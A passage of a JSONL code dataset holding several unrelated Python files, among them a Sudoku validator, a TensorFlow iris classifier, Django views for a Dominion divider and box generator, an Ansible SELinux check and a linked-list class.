[set([]) for i in range(9)]\n col = [set([]) for i in range(9)]\n grid = [set([]) for i in range(9)]\n\n for r in range(9):\n for c in range(9):\n if board[r][c] == '.':\n continue\n if board[r][c] in row[r]:\n return False\n if board[r][c] in col[c]:\n return False\n\n g = r / 3 * 3 + c / 3\n if board[r][c] in grid[g]:\n return False\n grid[g].add(board[r][c])\n row[r].add(board[r][c])\n col[c].add(board[r][c])\n\n return True\n\n\ns = Solution()\ns.isValidSudoku([\".87654321\",\n \"2........\", \"3........\", \"4........\",\n \"5........\", \"6........\", \"7........\",\n \"8........\", \"9........\"])\n","sub_path":"036.py","file_name":"036.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"409241795","text":"import numpy as np\nimport tensorflow as tf\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\n\n# 加载iris数据集\niris = load_iris()\nprint(iris)\n# 数据的特征值\niris_data = iris['data']\n# 数据标签值 0 1 2\niris_target = iris['target']\n\n# 处理数据的标签值\n# 0-> [1,0,0]\n# 1-> [0,1,0]\n# 2-> [0,0,1]\niris_label = np.zeros((iris_target.shape[0], 3))\nfor i in range(iris_target.shape[0]):\n iris_label[i, iris_target[i]] = 1\n\n# 切割训练集和测试集,训练集80% 测试集20%\niris_data_train, iris_data_test, iris_label_train, iris_label_test = train_test_split(iris_data, iris_label, test_size=0.2, random_state=123)\n# 标准化数据\n# 生成标准化规则\nstdScaler = StandardScaler().fit(iris_data_train)\n# 应用规则到训练集、测试集\niris_data_trainStd = stdScaler.transform(iris_data_train)\niris_data_testStd = stdScaler.transform(iris_data_test)\n\n# 数据与标签的占位\n# 输入值,IRIS输入层有4个神经元,None表示输入样本的数量暂不确定,可输入多个样本\nx = tf.placeholder(tf.float32, shape=[None, 4])\n# 输出值,IRIS将数据分为3类,输出层有3个神经元,None表示输入样本的数量暂不确定\n# 真实值,后面用于和预测值比较计算准确率\ny_actual = tf.placeholder(tf.float32, shape=[None, 3])\n\n# 初始化权重和偏置,后面训练时需要更新\nW = tf.Variable(tf.zeros([4, 3]))\nb = tf.Variable(tf.zeros([3]))\n\n# 由于iris分类问题是一个多分类问题,所以激活函数选用softmax得到预测值\ny_predict = tf.nn.softmax(tf.matmul(x, W) + b)\n\n# 预测值和真实值,通过交叉熵函数,得到损失函数\ncross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=y_predict, labels=tf.argmax(y_actual, 1))\n\n# 通过梯度下降算法使得残差最小\ntrain_step = tf.train.GradientDescentOptimizer(0.01).minimize(cross_entropy)\n\n# 计算准确率\ncorrect_prediction = tf.equal(tf.argmax(y_predict, 1), tf.argmax(y_actual, 1))\n# 多个批次准确率均值\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, 'float'))\n\n# 初始化变量 tf.zeros权重和偏置初始化为0\ninit = tf.global_variables_initializer()\n# 打开会话\nwith tf.Session() as sess:\n # 初始化变量\n sess.run(init)\n # 训练轮数为训练集样本数除以10,一轮喂10个样本\n for i in range(iris_label_train.shape[0] // 10):\n # 训练集批量喂入,一次喂10个样本\n data = iris_data_trainStd[i * 10:i * 10 + 10, :]\n label = iris_label_train[i * 10:i * 10 + 10, :]\n # 执行梯度下降算法,每执行一次,更新一次权重和偏置\n sess.run(train_step, feed_dict={x: data, y_actual: label})\n # 每更新一次参数,就使用测试集计算一次准确率\n print(\"accuracy:\", sess.run(accuracy, feed_dict={x: iris_data_testStd, y_actual: iris_label_test}))","sub_path":"iris_classification.py","file_name":"iris_classification.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"8876379","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\n\nimport unittest\n\nimport numpy as np\nimport tensorflow as tf\nfrom unittest.mock import Mock\n\nfrom kglib.utils.test.utils import get_call_args\nfrom kglib.kgcn.models.typewise import TypewiseEncoder\n\n\nclass TestTypewiseEncoder(unittest.TestCase):\n def setUp(self):\n tf.enable_eager_execution()\n\n def test_types_encoded_by_expected_functions(self):\n things = np.array([[0, 0], [1, 0], [2, 0.5673]], dtype=np.float32)\n\n mock_entity_relation_encoder = Mock(return_value=np.array([[0, 0, 0], [0, 0, 0]], dtype=np.float32))\n\n mock_attribute_encoder = Mock(return_value=np.array([[0.9527, 0.2367, 0.7582]], dtype=np.float32))\n\n encoders_for_types = {lambda: mock_entity_relation_encoder: [0, 1], lambda: mock_attribute_encoder: [2]}\n\n tm = TypewiseEncoder(encoders_for_types, 3)\n encoding = tm(things) # The function under test\n\n np.testing.assert_array_equal([[np.array([[0], [0]], dtype=np.float32)]],\n get_call_args(mock_entity_relation_encoder))\n\n np.testing.assert_array_equal([[np.array([[0.5673]], dtype=np.float32)]], get_call_args(mock_attribute_encoder))\n\n expected_encoding = np.array([[0, 0, 0], [0, 0, 0], [0.9527, 0.2367, 0.7582]], dtype=np.float32)\n np.testing.assert_array_equal(expected_encoding, encoding.numpy())\n\n def test_basic_encoding(self):\n things = np.array([[0], [1], [2]], dtype=np.float32)\n\n mock_entity_relation_encoder = Mock(return_value=np.array([[0.1, 0, 0], [0.1, 0, 0], [0.1, 0, 0]], dtype=np.float32))\n\n encoders_for_types = {lambda: mock_entity_relation_encoder: [0, 1, 2]}\n\n tm = TypewiseEncoder(encoders_for_types, 3)\n encoding = tm(things) # The function under test\n\n expected_encoding = np.array([[0.1, 0, 0], [0.1, 0, 0], [0.1, 0, 0]], dtype=np.float32)\n np.testing.assert_array_equal(expected_encoding, encoding.numpy())\n\n def test_encoders_do_not_fulfil_classes(self):\n mock_entity_relation_encoder = Mock()\n\n encoders_for_types = {lambda: mock_entity_relation_encoder: [0, 2]}\n\n with self.assertRaises(ValueError) as context:\n TypewiseEncoder(encoders_for_types, 3)\n\n self.assertEqual('Encoder categories are inconsistent. Expected [0, 1, 2], but got [0, 2]',\n str(context.exception))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"kglib/kgcn/models/typewise_test.py","file_name":"typewise_test.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"117878977","text":"##############################################################################\n#\n# Copyright (c) 2001, 2002 Zope Corporation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.0 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"File views.\n\n$Id: file.py,v 1.7 2004/04/25 16:19:26 srichter Exp $\n\"\"\"\nclass FileView(object):\n\n def show(self):\n \"\"\"Call the File\"\"\"\n request = self.request\n if request is not None:\n request.response.setHeader('Content-Type',\n self.context.contentType)\n request.response.setHeader('Content-Length',\n self.context.getSize())\n\n return self.context.data\n","sub_path":"Zope3/tags/cvs-to-svn-conversion/src/zope/app/file/browser/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"333834281","text":"import re\nimport base64\n\nfrom django.http import HttpResponse, JsonResponse, HttpResponseServerError, HttpResponseBadRequest\nfrom django.shortcuts import render\nfrom django import forms\nimport domdiv.main\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Submit, Layout, Div, HTML\nfrom crispy_forms.bootstrap import FormActions, Accordion, AccordionGroup, AppendedText\nfrom chitboxes.chitboxes import ChitBoxGenerator\nfrom tuckboxes.tuckboxes import TuckBoxGenerator\n\nPAGES = [('domdiv', 'Dominion Dividers'), ('chitboxes', 'Bits Boxes'),\n ('tuckboxes', 'Card Tuckboxes')]\n\nPAPER_SIZES = [u'Letter', u'Legal', u'A4', u'A3']\nTAB_SIDE_SELECTION = {\"left\": \"Left to Right (all tab counts)\",\n \"right\": \"Right to Left (all tab counts)\",\n \"left-alternate\": \"Left then Right (2 tabs)\",\n \"right-alternate\": \"Right then Left (2 tabs))\",\n \"left-flip\":\"Left then flip (2 tabs)\",\n \"right-flip\":\"Right then flip (2 tabs)\",\n \"centre\":\"Centre (1 tab)\",\n \"full\":\"Full width (1 tab)\"}\nTAB_NUMBER_SELECTION = {1: \"1: all in the same location\", 2: \"2: alternating sides\", 3: \"3\", 4: \"4\", 5: \"5\"}\n\nclass TabGenerationOptionsForm(forms.Form):\n def __init__(self, *args, **kwargs):\n super(TabGenerationOptionsForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.layout = Layout(\n Div(Div(HTML('

      Generation Options

      '), css_class='col-md-9'),\n Div(FormActions(\n Submit('submit', 'Generate', style=\"margin-top: 20px;\")),\n css_class='col-md-3'),\n css_class='row'),\n Div(\n Div(\n Accordion(\n AccordionGroup('Expansion Selection', 'expansions',\n 'fan_expansions'),\n AccordionGroup('Page Options', \n 'pagesize',\n HTML(\"Selecting Labels will override some settings to fit the size of the label\"),\n 'no_footer',\n AppendedText('back_offset', 'points', active=True),\n AppendedText('back_offset_height', 'points', active=True)),\n AccordionGroup('Style Options',\n 'orientation', \n 'wrappers', 'notch', \n 'linetype', 'cardsize',\n AppendedText('horizontal_gap', 'cm', active=True),\n AppendedText('vertical_gap', 'cm', active=True)\n ),\n AccordionGroup('Tab Options',\n 'tab_number', 'tab_side', 'serpentine', 'reset_tabs',\n 'tab_name_align', 'set_icon', 'cost_icon', 'black_tabs',\n AppendedText('tabwidth', 'cm', active=True)\n ),\n AccordionGroup('Body Options',\n 'counts', 'types', \n 'divider_front_text', 'divider_back_text',\n 'language'),\n AccordionGroup('Order, Groups and Extras',\n 'order',\n 'group_special', 'base_cards_with_expansion',\n 'upgrade_with_expansion', 'events',\n 'expansion_dividers', \n 'centre_expansion_dividers',\n 'expansion_dividers_long_name'),\n ),\n css_class='col-md-12',\n ),\n 'tag',\n css_class='row',\n ))\n self.helper.form_id = 'id-tabgenoptions'\n self.helper.form_class = 'blueForms'\n self.helper.form_method = 'post'\n self.helper.form_action = '/'\n for field in self.fields.values():\n field.required = False\n choices = ['Horizontal', 'Vertical']\n orientation = forms.ChoiceField(\n choices=list(zip(choices, choices)),\n label='Divider Orientation',\n initial='Horizontal')\n pagesize = forms.ChoiceField(\n choices=list(zip(PAPER_SIZES + domdiv.main.LABEL_KEYS, PAPER_SIZES + domdiv.main.LABEL_SELECTIONS)),\n label='Paper Type',\n initial='Letter')\n choices = ['Sleeved - Thin', 'Sleeved - Thick', 'Unsleeved']\n cardsize = forms.ChoiceField(\n choices=list(zip(choices, choices)),\n label='Card Size',\n initial='Unsleeved')\n tabwidth = forms.FloatField(\n label='Width of Tab in centimeters',\n initial='4.0',\n required=False,\n widget=forms.TextInput())\n back_offset = forms.FloatField(\n label='Back page horizontal offset points to shift to the right',\n initial='0',\n required=False,\n widget=forms.TextInput())\n back_offset_height = forms.FloatField(\n label='Back page vertical offset points to shift upward',\n initial='0',\n required=False,\n widget=forms.TextInput())\n\n horizontal_gap = forms.FloatField(\n label='Horizontal gap between dividers in centimeters',\n initial='0',\n required=False,\n widget=forms.TextInput())\n vertical_gap = forms.FloatField(\n label='Vertical gap between dividers in centimeters',\n initial='0',\n required=False,\n widget=forms.TextInput())\n\n black_tabs = forms.BooleanField(\n label='Black tab background',\n initial=False\n )\n # Expansions\n choices = domdiv.main.EXPANSION_CHOICES\n # make pretty names for the expansion choices\n choiceNames = []\n replacements = {\n '1stedition': '1st Edition',\n '2ndeditionupgrade': '2nd Edition Upgrade',\n '2ndedition': '2nd Edition'\n }\n for choice in choices:\n for s, r in replacements.items():\n if choice.lower().endswith(s):\n choiceNames.append('{} {}'.format(\n choice[:-len(s)].capitalize(), r))\n break\n else:\n choiceNames.append(choice.capitalize())\n expansions = forms.MultipleChoiceField(\n choices=list(zip(choices, choiceNames)),\n label='Expansions to Include (Cmd/Ctrl click to select multiple)',\n initial=choices,\n widget=forms.SelectMultiple(attrs={'size': '18'}))\n # Now Fan expansions\n choices = domdiv.main.FAN_CHOICES\n # make pretty names for the expansion choices\n choiceNames = []\n for choice in choices:\n for s, r in replacements.items():\n if choice.lower().endswith(s):\n choiceNames.append('{} {}'.format(\n choice[:-len(s)].capitalize(), r))\n break\n else:\n choiceNames.append(choice.capitalize())\n fan_expansions = forms.MultipleChoiceField(\n choices=list(zip(choices, choiceNames)),\n label='Fan Expansions to Include (Cmd/Ctrl click to select multiple)',\n initial='',\n widget=forms.SelectMultiple(attrs={'size': '3'}))\n base_cards_with_expansion = forms.BooleanField(\n label=\"Include Base cards with the expansion\", initial=False)\n upgrade_with_expansion = forms.BooleanField(\n label=\"Include upgrade cards with the expansion being upgraded\",\n initial=False)\n edition = forms.ChoiceField(\n choices=list(\n zip(domdiv.main.EDITION_CHOICES, domdiv.main.EDITION_CHOICES)),\n label='Edition',\n initial='latest')\n cropmarks = forms.BooleanField(\n label=\"Cropmarks Instead of Outlines\", initial=False)\n linetype = forms.ChoiceField(\n choices=list(\n zip(domdiv.main.LINE_CHOICES,\n domdiv.main.LINE_CHOICES)),\n label='Outline Type',\n initial='line') \n wrappers = forms.BooleanField(\n label=\"Slipcases Instead of Dividers\", initial=False)\n notch = forms.BooleanField(\n label=\"If Slipcases, add a notch in corners\", initial=False)\n serpentine = forms.BooleanField(\n label=\"For 3 or more tabs, tab location reverses when the end is reached instead of resetting to the start\",\n initial=False)\n reset_tabs = forms.BooleanField(\n label=\"Restart tab starting location with every expansion.\", \n initial=True)\n counts = forms.BooleanField(\n label=\"Show number of Cards per Divider\", initial=False)\n types = forms.BooleanField(\n label=\"Show Card Type on each Divider\", initial=False)\n tab_name_align = forms.ChoiceField(\n choices=list(\n zip(domdiv.main.NAME_ALIGN_CHOICES,\n domdiv.main.NAME_ALIGN_CHOICES)))\n tab_number = forms.ChoiceField(\n choices=list(zip(\n [x for x in TAB_NUMBER_SELECTION],\n [TAB_NUMBER_SELECTION[x] for x in TAB_NUMBER_SELECTION])),\n label='Number of tabs',\n initial=1)\n\n for x in domdiv.main.TAB_SIDE_CHOICES:\n if x not in TAB_SIDE_SELECTION:\n TAB_SIDE_SELECTION[x] = x.title()\n tab_side = forms.ChoiceField(\n choices=list(zip(\n [x for x in TAB_SIDE_SELECTION],\n [TAB_SIDE_SELECTION[x] for x in TAB_SIDE_SELECTION])),\n label='Starting tab location',\n initial='left')\n samesidelabels = forms.BooleanField(\n label=\"Same Side Labels\", initial=False)\n order = forms.ChoiceField(\n label=\"Divider Order\",\n choices=list(\n zip(domdiv.main.ORDER_CHOICES, domdiv.main.ORDER_CHOICES)))\n group_special = forms.BooleanField(\n label=\"Group Special Cards (e.g. Prizes)\", initial=True)\n expansion_dividers = forms.BooleanField(\n label=\"Include Expansion Dividers\", initial=False)\n centre_expansion_dividers = forms.BooleanField(\n label=\"If Expansion Dividers, centre the tabs on expansion dividers\",\n initial=False)\n expansion_dividers_long_name = forms.BooleanField(\n label=(\"If Expansion Dividers, use edition \"\n \"on expansion dividers names\"),\n initial=False)\n set_icon = forms.ChoiceField(\n choices=list(\n zip(domdiv.main.LOCATION_CHOICES, domdiv.main.LOCATION_CHOICES)),\n label=\"Set Icon Location\",\n initial=\"tab\")\n cost_icon = forms.ChoiceField(\n choices=list(\n zip(domdiv.main.LOCATION_CHOICES, domdiv.main.LOCATION_CHOICES)),\n label=\"Cost Icon Location\",\n initial=\"tab\")\n language = forms.ChoiceField(\n choices=list(\n zip(domdiv.main.LANGUAGE_CHOICES, domdiv.main.LANGUAGE_CHOICES)),\n label='Language',\n initial='en_us')\n events = forms.BooleanField(\n label=\"Exclude Individual Events & Landmarks\", initial=False)\n divider_front_text = forms.ChoiceField(\n label='Front Text',\n choices=list(zip(domdiv.main.TEXT_CHOICES, domdiv.main.TEXT_CHOICES)),\n initial='card')\n divider_back_text = forms.ChoiceField(\n label='Back Text',\n choices=list(\n zip(domdiv.main.TEXT_CHOICES + ['none'],\n domdiv.main.TEXT_CHOICES + ['no back page'])),\n initial='rules')\n no_footer = forms.BooleanField(\n label='Omit the expansion name at the bottom of the page', initial=False)\n tag = forms.CharField(widget=forms.HiddenInput(), initial='domdiv')\n\n\nclass ChitBoxForm(forms.Form):\n def __init__(self, *args, **kwargs):\n super(ChitBoxForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.layout = Layout(\n Div(Div(HTML('

      Generation Options

      '), css_class='col-md-9'),\n Div(FormActions(\n Submit('submit', 'Generate', style=\"margin-top: 20px;\")),\n css_class='col-md-3'),\n css_class='row'),\n Div(\n Div(\n Accordion(\n AccordionGroup('Measurements', 'width', 'length',\n 'height'),\n AccordionGroup('Images', 'main_image', 'side_image')),\n css_class='col-md-12',\n ),\n 'tag',\n css_class='row',\n ))\n self.helper.form_id = 'id-tabgenoptions'\n self.helper.form_class = 'blueForms'\n self.helper.form_method = 'post'\n self.helper.form_action = '/chitboxes/'\n for field in self.fields.values():\n field.required = False\n\n width = forms.FloatField(\n label='Width in cm', min_value=1.0, max_value=20.0, initial=5)\n length = forms.FloatField(\n label='Length in cm', min_value=1.0, max_value=20.0, initial=5)\n height = forms.FloatField(\n label='Height in cm', min_value=1.0, max_value=20.0, initial=2)\n main_image = forms.ImageField(label='Upload Main Image')\n side_image = forms.ImageField(label='Upload Side Image')\n tag = forms.CharField(widget=forms.HiddenInput(), initial='chitboxes')\n\n\nclass TuckBoxForm(forms.Form):\n def __init__(self, *args, **kwargs):\n super(TuckBoxForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.layout = Layout(\n Div(Div(HTML('

      Generation Options

      '), css_class='col-md-9'),\n Div(FormActions(\n Submit('submit', 'Generate', style=\"margin-top: 20px;\")),\n css_class='col-md-3'),\n css_class='row'),\n Div(\n Div(\n Accordion(\n AccordionGroup('Measurements', 'width', 'height',\n 'depth'),\n AccordionGroup('Images', 'front_image', 'side_image',\n 'back_image', 'end_image',\n 'fill_colour', 'preserve_side_aspect',\n 'preserve_end_aspect')),\n css_class='col-md-12',\n ),\n 'tag',\n css_class='row',\n ))\n self.helper.form_id = 'id-tabgenoptions'\n self.helper.form_class = 'blueForms'\n self.helper.form_method = 'post'\n self.helper.form_action = '/tuckboxes/'\n for field in self.fields.values():\n field.required = False\n\n width = forms.FloatField(\n label='Width in cm (1-20)', min_value=1.0, max_value=20.0, initial=6)\n height = forms.FloatField(\n label='Height in cm (1-20)', min_value=1.0, max_value=20.0, initial=9.3)\n depth = forms.FloatField(\n label='Depth in cm (1-20)', min_value=1.0, max_value=20.0, initial=3)\n front_image = forms.ImageField(label='Upload Main Image')\n side_image = forms.ImageField(label='Upload Side Image')\n back_image = forms.ImageField(label='Upload Back Image')\n end_image = forms.ImageField(label='Upload End Image')\n preserve_side_aspect = forms.BooleanField(\n label='Preserve Side Image Aspect', initial=True)\n preserve_end_aspect = forms.BooleanField(\n label='Preserve End Image Aspect', initial=True)\n fill_colour = forms.CharField(\n widget=forms.TextInput(attrs={'type': 'color'}), initial='#99FF99')\n tag = forms.CharField(widget=forms.HiddenInput(), initial='tuckboxes')\n\n\ndef _init_options_from_form_data(post_data):\n form = TabGenerationOptionsForm(post_data)\n if form.is_valid():\n # generate default options\n options = domdiv.main.parse_opts([])\n options = domdiv.main.clean_opts(options)\n data = form.cleaned_data\n options.orientation = data['orientation'].lower()\n # Separate out the various card sizes\n if 'unsleeved' in data['cardsize'].lower():\n options.size = 'unsleeved'\n else:\n options.size = 'sleeved'\n if 'thick' in data['cardsize'].lower():\n options.sleeved_thick = True\n elif 'thin' in data['cardsize'].lower():\n options.sleeved_thin = True\n # due to argparse this should be a list of lists\n options.expansions = [[e] for e in data['expansions']]\n options.fan = [[e] for e in data['fan_expansions']]\n if data['back_offset']:\n options.back_offset = data['back_offset']\n if data['back_offset_height']:\n options.back_offset_height = data['back_offset_height']\n if data['horizontal_gap']:\n options.horizontal_gap = data['horizontal_gap']\n if data['vertical_gap']:\n options.vertical_gap = data['vertical_gap']\n options.black_tabs = data['black_tabs']\n options.upgrade_with_expansion = data['upgrade_with_expansion']\n options.base_cards_with_expansion = data['base_cards_with_expansion']\n options.wrapper = data['wrappers']\n options.notch = data['notch']\n options.cropmarks = data['cropmarks']\n options.linetype = data['linetype']\n options.tab_serpentine = data['serpentine']\n options.expansion_reset_tabs = data['reset_tabs']\n options.count = data['counts']\n options.types = data['types']\n options.tab_name_align = data['tab_name_align']\n options.tab_number = int(data['tab_number'])\n options.tab_side = data['tab_side']\n options.expansion_dividers = data['expansion_dividers']\n options.centre_expansion_dividers = data['centre_expansion_dividers']\n options.expansion_dividers_long_name = data['expansion_dividers_long_name']\n options.cost = data['cost_icon']\n options.set_icon = data['set_icon']\n options.order = data['order']\n options.group_special = data['group_special']\n options.language = data['language']\n options.group_global = None # Default to no global groupings of Events, Landmarks, Ways, etc\n options.exclude_events = data['events']\n options.exclude_landmarks = data['events']\n options.text_front = data['divider_front_text']\n options.text_back = data['divider_back_text']\n options.no_page_footer = data['no_footer']\n options.tabwidth = data['tabwidth']\n # Paper or Labels?\n if data['pagesize'] in PAPER_SIZES:\n options.papersize = data['pagesize']\n options.label_name = None\n else:\n options.label_name = data['pagesize']\n options.papersize = 'letter'\n options.wrapper = False\n options.notch = False\n options.cropmarks = False\n options = domdiv.main.clean_opts(options)\n print('options after cleaning:', options)\n return options\n return None\n\n\ndef index(request):\n if request.method == 'POST':\n options = _init_options_from_form_data(request.POST)\n print('options after POST:', options)\n # Create the HttpResponse object with the appropriate PDF headers.\n response = HttpResponse(content_type='application/pdf')\n response[\n 'Content-Disposition'] = 'attachment; filename=\"sumpfork_dominion_tabs.pdf\"'\n options.outfile = response\n domdiv.main.generate(options)\n return response\n else:\n form = TabGenerationOptionsForm()\n\n return render(request, 'dominion_dividers/index.html', {\n 'form': form,\n 'pages': PAGES,\n 'active': 'domdiv'\n })\n\n\ndef preview(request):\n print('preview request: {}'.format(request))\n print('preview post: {}'.format(request.POST))\n print('preview files: {}'.format(request.FILES))\n if request.POST['tag'] == 'domdiv':\n return domdiv_preview(request)\n elif request.POST['tag'] == 'chitboxes':\n return chitbox_preview(request)\n elif request.POST['tag'] == 'tuckboxes':\n return tuckbox_preview(request)\n else:\n return HttpResponseBadRequest('Unknown tag: {}'.format(\n request.POST['tag']))\n\n\ndef domdiv_preview(request):\n options = _init_options_from_form_data(request.POST)\n preview_img = domdiv.main.generate_sample(options)\n preview_img = base64.b64encode(preview_img).decode('ascii')\n try:\n return JsonResponse({'preview_data': preview_img})\n except Exception as e:\n return HttpResponseServerError('Error generating domdiv preview: ' +\n str(e))\n\n\ndef chitbox_preview(request):\n form = ChitBoxForm(request.POST, request.FILES)\n if form.is_valid():\n data = form.cleaned_data\n generator = ChitBoxGenerator.fromRawData(\n data['width'],\n data['length'],\n data['height'],\n None,\n None,\n None,\n )\n preview_img = generator.generate_sample()\n preview_img = base64.b64encode(preview_img).decode('ascii')\n try:\n return JsonResponse({'preview_data': preview_img})\n except Exception as e:\n return HttpResponseServerError(\n 'Error generating chitbox preview: ' + str(e))\n else:\n return HttpResponseBadRequest(\"invalid form data: {}\".format(\n request.POST))\n\n\ndef tuckbox_preview(request):\n form = TuckBoxForm(request.POST, request.FILES)\n if form.is_valid():\n data = form.cleaned_data\n fc = re.match(r'#(\\w{2})(\\w{2})(\\w{2})', data['fill_colour']).groups()\n fc = tuple(int(p, 16) / 255.0 for p in fc)\n\n c = TuckBoxGenerator.fromRawData(\n data['width'], data['height'], data['depth'],\n fillColour=fc, preserveSideAspect=data['preserve_side_aspect'],\n preserveEndAspect=data['preserve_end_aspect'])\n preview_img = c.generate_sample()\n preview_img = base64.b64encode(preview_img).decode('ascii')\n try:\n return JsonResponse({'preview_data': preview_img})\n except Exception as e:\n return HttpResponseServerError(\n 'Error generating tuckbox preview: ' + str(e))\n else:\n return HttpResponseBadRequest(\"invalid form data: {}\".format(\n request.POST))\n\n\ndef chitboxes(request):\n if request.method == 'POST':\n form = ChitBoxForm(request.POST, request.FILES)\n if form.is_valid():\n data = form.cleaned_data\n # Create the HttpResponse object with the appropriate PDF headers.\n response = HttpResponse(content_type='application/pdf')\n response[\n 'Content-Disposition'] = 'attachment; filename=\"sumpfork_chitbox.pdf\"'\n c = ChitBoxGenerator.fromRawData(\n data['width'], data['length'], data['height'], response,\n data['main_image'], data['side_image'])\n c.generate()\n\n return response\n else:\n form = ChitBoxForm()\n return render(request, 'dominion_dividers/index.html', {\n 'form': form,\n 'pages': PAGES,\n 'active': 'chitboxes'\n })\n\n\ndef tuckboxes(request):\n if request.method == 'POST':\n form = TuckBoxForm(request.POST, request.FILES)\n if form.is_valid():\n data = form.cleaned_data\n # Create the HttpResponse object with the appropriate PDF headers.\n response = HttpResponse(content_type='application/pdf')\n response[\n 'Content-Disposition'] = 'attachment; filename=\"sumpfork_chitbox.pdf\"'\n fc = re.match(r'#(\\w{2})(\\w{2})(\\w{2})',\n data['fill_colour']).groups()\n fc = tuple(int(p, 16) / 255.0 for p in fc)\n c = TuckBoxGenerator.fromRawData(\n data['width'], data['height'], data['depth'], response,\n data['front_image'], data['side_image'], data['back_image'],\n data['end_image'], fc, data['preserve_side_aspect'],\n data['preserve_end_aspect'])\n c.generate()\n c.close()\n return response\n else:\n form = TuckBoxForm()\n return render(request, 'dominion_dividers/index.html', {\n 'form': form,\n 'pages': PAGES,\n 'active': 'tuckboxes'\n })\n","sub_path":"bgtools/dominion_dividers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":24492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"593741621","text":"from ansible.module_utils.basic import AnsibleModule\nimport sys\n\nclass SelinuxCheck:\n def __init__(self, ansible_selinux):\n self.ansible_selinux = ansible_selinux\n\n def selinux_set_correctly(self):\n selinux_status = self.ansible_selinux['status']\n\n if selinux_status == 'disabled':\n return True\n if selinux_status == 'enabled':\n selinux_mode = self.ansible_selinux['mode']\n if selinux_mode == 'permissive':\n return True\n\n return False\n\n def get_attribute(self, attribute):\n return self.ansible_selinux[attribute]\n\ndef main():\n argument_spec = dict(\n ansible_selinux=dict(required=True, type='dict')\n )\n\n module = AnsibleModule(argument_spec=argument_spec,\n check_invalid_arguments=True,\n supports_check_mode=True)\n\n ansible_selinux = module.params['ansible_selinux']\n\n check = SelinuxCheck(ansible_selinux)\n check_result = check.selinux_set_correctly()\n\n if check_result:\n message = \"Passed\"\n module.exit_json(failed=False, msg=message)\n else:\n message = \"The pre-deployment validation has determined that SELinux is not set as expected. See the \\\"Configure SELinux\\\" topic in SAS Viya on Linux: Deployment Guide for information about deploying with SELinux.\"\n module.fail_json(msg=message)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"library/selinux_check.py","file_name":"selinux_check.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"202650080","text":"from typing import Any\n\nfrom node import Node\n\n\nclass LinkedList:\n def __init__(self):\n self.__head = None\n self.__tail = None\n self.__len = 0\n\n def __len__(self):\n return self.__len\n\n def insert(self, index, value):\n insert_node = Node(value)\n if not self.__len: # пустой список\n self.__head = insert_node\n self.__tail = self.__head\n elif index >= self.__len: # вставка вне границ\n insert_node.prev = self.__tail\n self.__tail.next = insert_node\n self.__tail = insert_node\n\n self.__len += 1\n\n def append(self, value: Any) -> None:\n \"\"\"\n Append Node to tail of LinkedList\n\n :param value:\n :return: None\n \"\"\"\n append_node = Node(value)\n if not self.__len: # пустой список\n self.__head = append_node\n self.__tail = self.__head\n else:\n append_node.prev = self.__tail\n self.__tail.next = append_node\n self.__tail = append_node\n\n self.__len += 1\n\n def __iter__(self):\n current_node = self.__head\n for _ in range(self.__len):\n yield current_node.value\n current_node = current_node.next\n\n def clear(self):\n current_node = self.__head\n for _ in range(self.__len):\n next_node = current_node.next\n del(current_node)\n current_node = next_node\n self.__len = 0\n\n def test_memory(self):\n self.append(5)\n self.clear()\n print(self.__head)\n print(self.__tail)\n\n def find(self, value):\n for index, linked_list_value in self:\n if value == linked_list_value:\n return index\n\n\n def remove(self, value):\n ...\n\n def delete(self, index):\n ...\n\n\nif __name__ == '__main__':\n l = LinkedList()\n l.test_memory()\n # l.append(1)\n # l.append(2)\n #\n # for value in l:\n # print(value)\n\n","sub_path":"linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"349185382","text":"import os\nimport sys\n\ntry:\n x = 0\n caminho = os.path.abspath(f'{sys.argv[1]}')\n reverse = []\n with open(caminho, \"r\", encoding=\"utf8\") as file:\n for line in reversed(list(file)):\n line = line.strip()\n reverse.append(line)\n x+=1\n if x>9:\n break\n 